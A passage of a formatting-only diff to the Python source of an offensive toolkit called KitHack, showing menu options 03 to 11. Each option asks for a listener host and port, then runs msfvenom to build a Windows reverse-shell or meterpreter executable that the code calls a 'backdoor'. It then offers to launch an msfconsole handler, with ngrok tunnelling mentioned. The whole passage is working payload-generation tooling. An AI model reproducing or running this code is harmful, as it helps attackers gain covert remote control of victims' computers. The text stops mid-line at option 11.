"\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '03': + elif pay == "03": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '04': + elif pay == "04": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '05': + elif pay == "05": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '06': + elif pay == "06": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '07': + elif pay == "07": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '08': + elif pay == "08": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '09': + elif pay == "09": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '10': + elif pay == "10": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '11': + elif pay == "11": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql 